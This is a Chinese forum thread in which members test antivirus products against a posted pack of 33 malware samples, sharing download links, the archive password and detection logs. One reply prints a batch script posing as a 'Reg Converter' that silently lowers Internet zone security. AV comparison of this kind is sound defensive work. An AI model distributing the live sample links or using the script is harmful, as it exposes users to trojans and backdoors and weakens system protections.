恶意软件样本测试包 20231124期 33X

显示全部楼层 · 发表于 2023-11-29 21:03:22

下载1：https://pan.huang1111.cn/s/1VZAcv
下载2：https://pan.xiaomuxi.cn/s/g2yCL
下载3：https://f.ws59.cn/f/csb8icsvq5d （24h）

解压密码：infected

温馨提示与免责声明：仅供学习、研究、测试用途，样本可能具有威胁您的计算机安全的风险，下载即代表您应自行承担相应带来的所有风险

显示全部楼层 · 发表于 2023-11-29 21:05:06

本帖最后由 UNknownOoo 于 2023-11-29 21:14 编辑

火绒
扫描：21X（奇怪...为什么火绒没有自动更新...明明开着的来着

扫描文件：35
发现风险：21
已处理风险：0
病毒详情：
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\1.ps1, 病毒名：HEUR:TrojanDownloader/PS.NetLoader.e, 病毒ID：a79f5c1e37b6f79f, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\Ch7Demo6.exe, 病毒名：Trojan/Generic!A580E807D8F27532, 病毒ID：a580e807d8f27532, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\9847256657.exe, 病毒名：Trojan/Generic!ADF021536FFD0E08, 病毒ID：adf021536ffd0e08, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\2023财汇部门薪资通知调整.exe, 病毒名：Trojan/Generic!696A87949295C9D4, 病毒ID：696a87949295c9d4, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\-名-单-.exe, 病毒名：Trojan/Generic!C31ADB5A2E7EAE36, 病毒ID：c31adb5a2e7eae36, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\de274d03646b2f79a9f9dc3b6d2f6e40814847564049f51caff2296ce880953a.exe, 病毒名：Trojan/Generic!DDAA9457F9914703, 病毒ID：ddaa9457f9914703, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\e85e1400a4d223842f2dbf9a425f9567231dfbd7b6fb04d627b8fab31fbf7a28.exe, 病毒名：Trojan/Generic!649DD6FE21279EE5, 病毒ID：649dd6fe21279ee5, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\2024年企业税收减免新政策.exe, 病毒名：Trojan/Generic!639C64CBF88963C0, 病毒ID：639c64cbf88963c0, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\企业会计实操大全.exe, 病毒名：Trojan/Generic!01A5087C99E08FE2, 病毒ID：01a5087c99e08fe2, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\sw-终端-2.exe, 病毒名：Trojan/Generic!02AE7D40D2817CB6, 病毒ID：02ae7d40d2817cb6, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\Yj6wYczqybrHad2.exe, 病毒名：TrojanSpy/MSIL.AgentTesla.mq, 病毒ID：9abee9103f76285d, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\白加黑2\UnityPlayer.dll, 病毒名：Trojan/Generic!D8F4A94E3E08A668, 病毒ID：d8f4a94e3e08a668, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\13bf8fd.msi >> _B615A6B64FA2676C199FA714031CA6CA, 病毒名：Backdoor/Meterpreter.e, 病毒ID：5cd341aa01bf8d3f, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\优秀员.exe, 病毒名：HVM:TrojanDownloader/Maloader.e, 病毒ID：6ca9aa2a58d08e33, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\sw-终端-1.exe, 病毒名：HEUR:TrojanDropper/Agent.p, 病毒ID：c1e71c9cdb4bf801, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\请查阅.exe, 病毒名：Trojan/ShellLoader.aw, 病毒ID：67a2fe0fed09e2ec, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\陈述.exe, 病毒名：TrojanSpy/MSIL.AgentTesla.mq, 病毒ID：9abee9103f76285d, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\2024年调整企业和个人所得税政策.exe, 病毒名：Backdoor/Lotok.s, 病毒ID：d0f95363c05031ef, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\金太阳教育集团-团体体检商务合作需求单.docx.exe, 病毒名：Trojan/ShellLoader.es, 病毒ID：5a4c20dcaa92f3f7, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\11.2各公司税务督查名单.exe, 病毒名：Trojan/Malex.p, 病毒ID：fd5e25f7c4d31442, 处理结果：暂不处理
风险路径：C:\Users\UnknownOoo\Downloads\Compressed\Downloads\piaoyunshuijiheyun8.exe, 病毒名：Trojan/Generic!A86590DF49B61051, 病毒ID：a86590df49b61051, 处理结果：暂不处理

复制代码

X-Sec
扫描：17X

---------------------
2023/11/29 21:06:03 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\11.2各公司税务督查名单.exe -- [rame-classic] Trojan.HiddenRun/SFX!1.D2BC
2023/11/29 21:06:04 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\-名-单-.exe -- [rame-classic] Trojan.HiddenRun/SFX!1.D2BC
2023/11/29 21:06:04 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\2023财汇部门薪资通知调整.exe -- [rame-cloud] Trojan.Kryptik!8.8
2023/11/29 21:06:05 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\2024年调整企业和个人所得税政策.exe -- [rame-tfe] Backdoor.Lotok!8.111D5
2023/11/29 21:06:06 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\61vpvp.exe -- [rame-tfe] Trojan.Agent!8.B1E
2023/11/29 21:06:07 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\Ch7Demo6.exe -- [rame-classic] Backdoor.Gh0st!1.EF4F
2023/11/29 21:06:08 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\piaoyunshuijiheyun8.exe -- [rame-classic] Trojan.HiddenRun/SFX!1.D2BC
2023/11/29 21:06:07 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\e85e1400a4d223842f2dbf9a425f9567231dfbd7b6fb04d627b8fab31fbf7a28.exe -- [rame-classic] Trojan.HiddenRun/SFX!1.D2BC
2023/11/29 21:06:09 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\Play to Grle U_4pm.eXe -- [rame-tfe] Trojan.Agent!8.B1E
2023/11/29 21:06:10 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\sw-终端-1.exe -- [rame-classic] Dropper.Agent/BAT!1.EADD
2023/11/29 21:06:11 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\Yj6wYczqybrHad2.exe -- [rame-rdm.msil2] Malware.Obfus/MSIL@AI.100
2023/11/29 21:06:11 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\unitycrashhandler64.exe -- [rame-tfe] Trojan.Agent!8.B1E
2023/11/29 21:06:12 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\企业会计实操大全.exe -- [rame-rdm.msil2] Malware.Obfus/MSIL@AI.100
2023/11/29 21:06:12 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\sw-终端-2.exe -- [rame-cloud] Backdoor.Lotok!8.111D5
2023/11/29 21:06:14 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\金太阳教育集团-团体体检商务合作需求单.docx.exe -- [xave-classic] Suspicious:Malware.FakeExt
2023/11/29 21:06:15 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\陈述.exe -- [rame-rdm.msil2] Malware.Obfus/MSIL@AI.100
2023/11/29 21:06:15 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\Downloads\白加黑1\WTSAPI32.dll -- [rame-classic] Backdoor.CobaltStrike!1.E8B2

复制代码

华为乾坤
扫描：4X

显示全部楼层 · 发表于 2023-11-29 21:08:08

蜘蛛 5x

2023/11/29 21:06 扫描仪侦测到威胁对象：陈述.exe 威胁： Trojan.Inject4.59820 操作：未解除威胁路径： C:\Users\x\OneDrive\桌面\Downloads\陈述.exe
2023/11/29 21:06 扫描仪侦测到威胁对象： 2024年调整企业和个人所得税政策.exe 威胁： Trojan.MulDrop24.22900 操作：已隔离路径： C:\Users\x\OneDrive\桌面\Downloads\2024年调整企业和个人所得税政策.exe
2023/11/29 21:06 扫描仪侦测到威胁对象： de274d03646b2f79a9f9dc3b6d2f6e40814847564049f51caff2296ce880953a.exe 威胁： Trojan.MulDrop8.1933 操作：未解除威胁路径： C:\Users\x\OneDrive\桌面\Downloads\de274d03646b2f79a9f9dc3b6d2f6e40814847564049f51caff2296ce880953a.exe
2023/11/29 21:06 扫描仪侦测到威胁对象： sw-终端-1.exe 威胁： Trojan.Siggen22.10519 操作：未解除威胁路径： C:\Users\x\OneDrive\桌面\Downloads\sw-终端-1.exe
2023/11/29 21:06 扫描仪侦测到威胁对象： Yj6wYczqybrHad2.exe 威胁： Trojan.PackedNET.2548 操作：未解除威胁路径： C:\Users\x\OneDrive\桌面\Downloads\Yj6wYczqybrHad2.exe

复制代码

显示全部楼层 · 发表于 2023-11-29 21:21:17

ESET 扫描剩余14个

显示全部楼层 · 发表于 2023-11-29 21:26:27

卡巴扫描剩余13X

显示全部楼层 · 发表于 2023-11-29 21:32:43

360：29

余

Ps.这是想看谁的拉黑/入库速度快吗（

显示全部楼层 · 发表于 2023-11-29 21:34:38

这种东西没什么放出来的必要吧

[url=home.php?mod=space&uid=331734]@echo[/url] Off
Title Reg Converter v1.2 & Color 4A
REM ~ call :IsAdmin
call :RegExport
Exit
:RegExport
Set RegFile="%Temp%\~wqwxzau.tmp"
If Exist %RegFile% (
Attrib -R -S -H %RegFile% & Del /F /Q %RegFile%
If Exist %RegFile% cls & Echo Could not delete file %RegFile% & Pause
)
> %RegFile% Echo Windows Registry Editor Version 5.00
>> %RegFile% Echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
>> %RegFile% Echo "1201"=dword:00000000
Start /Wait %systemroot%\Regedit.exe /S %RegFile%
Del %RegFile%
goto:eof
:IsAdmin
Reg.exe query "HKU\S-1-5-19\Environment"
If Not %ERRORLEVEL% EQU 0 (
Cls & Echo You must have administrator rights to continue ...
Pause & Exit
)
Cls
goto:eof

复制代码

显示全部楼层 · 发表于 2023-11-29 21:41:59

IKARUS - 18/33

显示全部楼层 · 发表于 2023-11-29 21:43:10

Hibike 发表于 2023-11-29 21:34
这种东西没什么放出来的必要吧

这个还有另一个bat我自动排除了

显示全部楼层 · 发表于 2023-11-29 21:54:44

KES 解压加扫描 23x

剩余10x，未双击

[病毒样本] 恶意软件样本测试包 20231124期 33X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源